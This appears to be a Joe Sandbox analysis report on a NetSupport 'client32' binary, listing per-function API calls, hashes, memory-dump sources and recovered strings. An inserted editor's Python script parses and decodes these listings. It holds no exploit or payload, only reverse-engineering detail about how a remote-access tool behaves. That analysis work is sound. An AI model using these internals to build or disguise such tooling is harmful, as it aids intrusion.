                                                        • Instruction ID: 2a0a03e10d028b360f6a22ee55a987c1a255e6312d7f70e3124523d6712918fa
                                                        • Opcode Fuzzy Hash: d7eadc563fd8f1edf11073224b815364cadfebc45bd2c66acbb8496d4c6402ae
                                                        • Instruction Fuzzy Hash: 2C610B75D0066A9FDB14CF68C984BEDF7F4FB48704F0045AAD91AA7284DB70AA84CF90
                                                        APIs
                                                          • Part of subcall function 11102BC0: GetCurrentThreadId.KERNEL32 ref: 11102BCE
                                                          • Part of subcall function 11102BC0: EnterCriticalSection.KERNEL32(00000000,75A33760,00000000,111DBD28,?,110C3135,00000000,75A33760), ref: 11102BD8
                                                          • Part of subcall function 11102BC0: LeaveCriticalSection.KERNEL32(00000000,75A4A1D0,00000000,?,110C3135,00000000,75A33760), ref: 11102BF8
                                                        • EnterCriticalSection.KERNEL32(00000000,00000000,75A33760,00000000,75A4A1D0,1105952B,?,?,?,?,110252A3,00000000,?,?,00000000), ref: 110C313B
                                                        • SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110C3168
                                                        • SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110C317A
                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,110252A3,00000000,?,?,00000000), ref: 110C3184
                                                        • IsDialogMessageA.USER32(00000000,?,?,?,?,110252A3,00000000,?,?,00000000), ref: 110C319B
                                                        • LeaveCriticalSection.KERNEL32(00000000,?,?,?,110252A3,00000000,?,?,00000000), ref: 110C31B1
                                                        • DestroyWindow.USER32(00000000,?,?,?,110252A3,00000000,?,?,00000000), ref: 110C31C1
                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,110252A3,00000000,?,?,00000000), ref: 110C31CB
                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,110252A3,00000000,?,?,00000000), ref: 110C31E1
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$Leave$Message$EnterSend$CurrentDestroyDialogThreadWindow
                                                        • String ID:
                                                        • API String ID: 1497311044-0
                                                        • Opcode ID: 6191cf186c74ae9112f6ea8ce94e4a318c72d3598519386d6d3182dab2fc4e7e
                                                        • Instruction ID: 3c1e887d7967a67240c1c164b22fb9d4592e7ef048b6f648851657ace213bb1e
                                                        • Opcode Fuzzy Hash: 6191cf186c74ae9112f6ea8ce94e4a318c72d3598519386d6d3182dab2fc4e7e
                                                        • Instruction Fuzzy Hash: 9821C436B15214AFE711DFA8EC84BDEB7B8EF86765F1440A5F909DB240D771A9008BE0
                                                        APIs
                                                        • GetProcAddress.KERNEL32(00000000,111838B8), ref: 1100D3A4
                                                        • GetProcAddress.KERNEL32(00000000,111838A8), ref: 1100D3B8
                                                        • GetProcAddress.KERNEL32(00000000,11183898), ref: 1100D3CD
                                                        • GetProcAddress.KERNEL32(00000000,11183888), ref: 1100D3E1
                                                        • GetProcAddress.KERNEL32(00000000,1118387C), ref: 1100D3F5
                                                        • GetProcAddress.KERNEL32(00000000,1118385C), ref: 1100D40A
                                                        • GetProcAddress.KERNEL32(00000000,1118383C), ref: 1100D41E
                                                        • GetProcAddress.KERNEL32(00000000,1118382C), ref: 1100D432
                                                        • GetProcAddress.KERNEL32(00000000,1118381C), ref: 1100D447
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                         • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc
                                                        • String ID:
                                                        • API String ID: 190572456-0
                                                        • Opcode ID: 6cfae3bc05f78b54d57e16c39f9828ee7bdb482090c8a32c341ca59fd490a75c
                                                        • Instruction ID: 1d850f4dc722c529ab0345deb5e5c80d8d70567c8a52cd3e1e9a14db29bad8e3
                                                        • Opcode Fuzzy Hash: 6cfae3bc05f78b54d57e16c39f9828ee7bdb482090c8a32c341ca59fd490a75c
                                                        • Instruction Fuzzy Hash: 4D31BEB1922630AFEB11CB65C8D8B5AF7E9A34C348F05827ADC298365CD7749441CF62
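The per-function API listings in this report (a run of GetProcAddress calls against one module handle, SendMessageTimeoutA with a raw message number and flag word, calls attributed to a subcall such as the 11027FB0 error handler) are easier to hunt on once they are structured. The following is an added example written for this page by the editor; it is not part of the Joe Sandbox report and not code from the NetSupport sample. It parses listing lines of the form shown above into records, extracts the function's own API set, the GetProcAddress name-string addresses, and decodes the SendMessageTimeoutA arguments using the Windows SDK values for WM_COPYDATA (0x4A) and the SMTO_* flags. The SAMPLE input is copied from the listing on this page; the bullet-line grammar the regex assumes and the GetProcAddress count threshold are the editor's assumptions.

```python
"""Parser for the per-function "APIs" listing of a Joe Sandbox report.

Added example by the editor, not part of the Joe Sandbox report and not
code from the NetSupport sample. It turns the bullet lines of the listing
into records so a function's API set can be queried, and decodes the
SendMessageTimeoutA arguments seen in the listing. SAMPLE below is copied
from this page; the line grammar and the GetProcAddress threshold are assumed.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Lines copied from the report listing (the GetProcAddress function, the
# SendMessageTimeoutA function and its 11027FB0 subcall entries).
SAMPLE = """\
APIs
• GetProcAddress.KERNEL32(00000000,111838B8), ref: 1100D3A4
• GetProcAddress.KERNEL32(00000000,111838A8), ref: 1100D3B8
• IsWindow.USER32(?), ref: 110450E1
• _malloc.LIBCMT ref: 1104517D
• SendMessageTimeoutA.USER32(?,0000004A,0001042A,00000005,00000002,00002710,?), ref: 11045242
  • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
  • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
"""

# One bullet (assumed grammar): optional subcall attribution, API.MODULE,
# optional (args), then "ref: <call-site address>".
_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[\w:@]+)\.(?P<mod>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Windows SDK values (winuser.h).
_WM = {0x004A: "WM_COPYDATA"}
_SMTO = {0x0001: "SMTO_BLOCK", 0x0002: "SMTO_ABORTIFHUNG",
         0x0008: "SMTO_NOTIMEOUTIFNOTHUNG", 0x0020: "SMTO_ERRORONEXIT"}


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple             # raw argument strings as printed; "?" means not recovered
    ref: int                # address of the call site in the dump
    subcall: Optional[int]  # callee address when the report attributes the call to a subcall


def parse_api_listing(text):
    """Return the ApiCall records in a listing; headers such as 'APIs' are skipped."""
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        raw = m["args"]
        args = tuple(a.strip() for a in raw.split(",")) if raw is not None else ()
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return calls


def direct_api_names(calls):
    """Unique APIs the function calls itself, subcall attributions excluded."""
    return sorted({c.api for c in calls if c.subcall is None})


def count_api(calls, name):
    return sum(1 for c in calls if c.api == name)


def resolves_imports_dynamically(calls, threshold=3):
    """Assumed heuristic: a run of GetProcAddress calls in one function is the
    pattern behind 'dynamically determine API calls' style signatures."""
    return count_api(calls, "GetProcAddress") >= threshold


def name_pointer_args(calls):
    """Second argument of each GetProcAddress call: the address of the procedure
    name string in the dump, where the resolved import names can be read."""
    return [int(c.args[1], 16) for c in calls
            if c.api == "GetProcAddress" and len(c.args) >= 2 and c.args[1] != "?"]


def describe_send_message_timeout(call):
    """Decode Msg, fuFlags and uTimeout of a SendMessageTimeoutA entry
    (argument order: hWnd, Msg, wParam, lParam, fuFlags, uTimeout, lpdwResult)."""
    if call.api != "SendMessageTimeoutA" or len(call.args) < 6:
        raise ValueError("not a fully decoded SendMessageTimeoutA entry")
    msg = int(call.args[1], 16)
    flags = int(call.args[4], 16)
    return {
        "msg": _WM.get(msg, f"0x{msg:04X}"),
        "flags": [name for bit, name in sorted(_SMTO.items()) if flags & bit],
        "timeout_ms": int(call.args[5], 16),
    }


if __name__ == "__main__":
    calls = parse_api_listing(SAMPLE)
    print(direct_api_names(calls))
    print(describe_send_message_timeout(
        next(c for c in calls if c.api == "SendMessageTimeoutA")))
```

Feeding a whole function's listing through `parse_api_listing` and comparing `direct_api_names` across functions is a quick way to pick out the ones worth opening in the dump; `name_pointer_args` gives the addresses (relative to the 0x11000000 image base of this dump) at which the names resolved by the GetProcAddress chain can be read, and the decoded SendMessageTimeoutA entry shows the call is a WM_COPYDATA send with SMTO_ABORTIFHUNG and a 10 second timeout.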
                                                        APIs
                                                        • IsWindow.USER32(?), ref: 110450E1
                                                        • _malloc.LIBCMT ref: 1104517D
                                                        • _memmove.LIBCMT ref: 110451E2
                                                        • SendMessageTimeoutA.USER32(?,0000004A,0001042A,00000005,00000002,00002710,?), ref: 11045242
                                                        • _free.LIBCMT ref: 11045249
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                          • Part of subcall function 11041AF0: _free.LIBCMT ref: 11041B77
                                                          • Part of subcall function 11041AF0: _free.LIBCMT ref: 11041B97
                                                          • Part of subcall function 11041AF0: _strncpy.LIBCMT ref: 11041BC5
                                                          • Part of subcall function 11041AF0: _strncpy.LIBCMT ref: 11041C02
                                                          • Part of subcall function 11041AF0: _malloc.LIBCMT ref: 11041C3C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                         • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$Message_malloc_strncpy$ErrorExitLastProcessSendTimeoutWindow_memmovewsprintf
                                                        • String ID: IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\DataStream.h
                                                        • API String ID: 3960737985-2967710367
                                                        • Opcode ID: f331cf77ee246184c656352fa7ac13d13ab4c8c0cd8c648676b23c116166795e
                                                        • Instruction ID: 815efef73f6f8acdca62cf46f73826a5586355b94afe20fa4b17fb913d10d18d
                                                        • Opcode Fuzzy Hash: f331cf77ee246184c656352fa7ac13d13ab4c8c0cd8c648676b23c116166795e
                                                        • Instruction Fuzzy Hash: C9C18374E006069FDB04DFA4C8D0EDEF7F5BF89308F208169E51AAB695DB71A905CB90
                                                        APIs
                                                        • _malloc.LIBCMT ref: 1103B593
                                                        • _memset.LIBCMT ref: 1103B5A1
                                                        • _memmove.LIBCMT ref: 1103B5AE
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                          • Part of subcall function 1103B280: Sleep.KERNEL32(000001F4,00000000,?,00000000,-111D903C), ref: 1103B2B1
                                                          • Part of subcall function 11027FB0: _strrchr.LIBCMT ref: 110280A5
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 110280E4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                         • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitProcess$ErrorLastMessageSleep_malloc_memmove_memset_strrchrwsprintf
                                                        • String ID: IsA()$PF%sinclude:*exclude:$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$redirect:
                                                        • API String ID: 3725223747-631189234
                                                        • Opcode ID: 97c419585ee3fcaf63ce288ecccf3252d882957436c914527fee62abe19327b8
                                                        • Instruction ID: af3a808404833258c6c9d3225ee65622eb91d499294cf0e06ea5ce819489668e
                                                        • Opcode Fuzzy Hash: 97c419585ee3fcaf63ce288ecccf3252d882957436c914527fee62abe19327b8
                                                        • Instruction Fuzzy Hash: F8B1D338E00A1B9FDB05DF59DC94BDEF7B6BF8920CF008154E91067685EB31AA04CBA1
                                                        APIs
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                        • std::exception::exception.LIBCMT ref: 1106B563
                                                        • __CxxThrowException@8.LIBCMT ref: 1106B578
                                                          • Part of subcall function 11082CA0: _memset.LIBCMT ref: 11082CBF
                                                          • Part of subcall function 11082CA0: InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,1106B543,00000000,00000000,1117066E,000000FF), ref: 11082D30
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                         • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _memset$CriticalException@8InitializeSectionThrow_mallocstd::exception::exceptionwsprintf
                                                        • String ID: Find
                                                        • API String ID: 523791932-1771883322
                                                        • Opcode ID: 8862f12f142f7f17eb3423287ecf04bd00d845d2771b8a10e84e4ddae85b51a2
                                                        • Instruction ID: 5db3a692f28a1e7eabe5ce6be605795cb1bc4f4b77a9999ad3559537c86c9e21
                                                        • Opcode Fuzzy Hash: 8862f12f142f7f17eb3423287ecf04bd00d845d2771b8a10e84e4ddae85b51a2
                                                        • Instruction Fuzzy Hash: 17B16DB5E006099FDB10CFA8C880AAEBBF8FF48314F14456EE416A7340EB75A901CB61
                                                        APIs
                                                        • IsWindow.USER32(?), ref: 11041778
                                                        • _malloc.LIBCMT ref: 110417D7
                                                        • _memmove.LIBCMT ref: 1104183C
                                                        • SendMessageTimeoutA.USER32(?,0000004A,0001042A,00000003,00000002,00002710,?), ref: 1104189C
                                                        • _free.LIBCMT ref: 110418A3
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                         • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Message$ErrorExitLastProcessSendTimeoutWindow_free_malloc_memmovewsprintf
                                                        • String ID: IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\DataStream.h
                                                        • API String ID: 3610575347-2967710367
                                                        • Opcode ID: 8c3cde6af5e7ac33c6be17841e90698f9797ef0f485e2b0be620b879412e99c7
                                                        • Instruction ID: 5f847ffeaf8ab7aa20607dcdf657b4052752ec8b68bbbdfc22ac1d27c6574067
                                                        • Opcode Fuzzy Hash: 8c3cde6af5e7ac33c6be17841e90698f9797ef0f485e2b0be620b879412e99c7
                                                        • Instruction Fuzzy Hash: BF416F75E0051AAFDB05CF95EC80EDDF3B4BF58718F108269F825A7694EB30A605CB91
                                                        APIs
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                        • CreateThread.KERNEL32(00000000,00000000,110E9400,00000000,00000000,00000000), ref: 110F94CD
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,1104A1B3), ref: 110F94D8
                                                        • GetExitCodeThread.KERNEL32(00000000,FFFFFFFF,?,1104A1B3), ref: 110F94E3
                                                        • CloseHandle.KERNEL32(00000000,?,1104A1B3), ref: 110F94EA
                                                        • SetLastError.KERNEL32(00000000,?,1104A1B3), ref: 110F9534
                                                          • Part of subcall function 110F8E80: _free.LIBCMT ref: 110F8F24
                                                          • Part of subcall function 110F8E80: _malloc.LIBCMT ref: 110F8F37
                                                          • Part of subcall function 110F8E80: _memmove.LIBCMT ref: 110F8F53
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                         • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Thread_malloc$CloseCodeCreateErrorExitHandleLastObjectSingleWait_free_memmove_memsetwsprintf
                                                        • String ID: Client$OldLogonUser
                                                        • API String ID: 2273177647-3714759566
                                                        • Opcode ID: c749c10b528402f76e781cde6db9bcf01e9e5f43c0efe7e3d428c594cd5ae9c0
                                                        • Instruction ID: 2f702813f4b4ab6c25c38db0d8a5041f92371cc8998c0e340031248ecbe83333
                                                        • Opcode Fuzzy Hash: c749c10b528402f76e781cde6db9bcf01e9e5f43c0efe7e3d428c594cd5ae9c0
                                                        • Instruction Fuzzy Hash: 624135B5D0561A9FDB00DFA4C845BEEB7F4EB49324F104619F925A7380EB34A500CBA1
                                                        APIs
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 1100F3AD
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 1100F3D0
                                                        • std::bad_exception::bad_exception.LIBCMT ref: 1100F454
                                                        • __CxxThrowException@8.LIBCMT ref: 1100F462
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 1100F475
                                                        • std::locale::facet::_Facet_Register.LIBCPMT ref: 1100F48F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                        • String ID: bad cast
                                                        • API String ID: 2427920155-3145022300
                                                        • Opcode ID: d1a36058dcafd43632a995b00d63964de3846e5127b68f0cf164bd7fd6529456
                                                        • Instruction ID: c1df3a49ef77ffe82b92d999ae27bd748b28a168d2cc7080f961c8e04f266e9b
                                                        • Opcode Fuzzy Hash: d1a36058dcafd43632a995b00d63964de3846e5127b68f0cf164bd7fd6529456
                                                        • Instruction Fuzzy Hash: F631A075D002169FDB15CF58C884B9EF7B8EB0576CF52466DEC21A7680DB30AA40CB93
                                                        APIs
                                                        • SetDlgItemTextA.USER32(?,?,11182200), ref: 110212D6
                                                        • GetDlgItem.USER32(?,?), ref: 110212EA
                                                        • SetFocus.USER32(00000000), ref: 110212ED
                                                        • GetDlgItem.USER32(?,?), ref: 11021318
                                                        • EnableWindow.USER32(00000000,00000000), ref: 1102131D
                                                        Strings
                                                        • e:\nsmsrc\nsm\1201\1201f2\ctl32\nsmdlg.h, xrefs: 11021301
                                                        • m_hWnd, xrefs: 11021306
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Item$EnableFocusTextWindow
                                                        • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\nsmdlg.h$m_hWnd
                                                        • API String ID: 467963834-3304639117
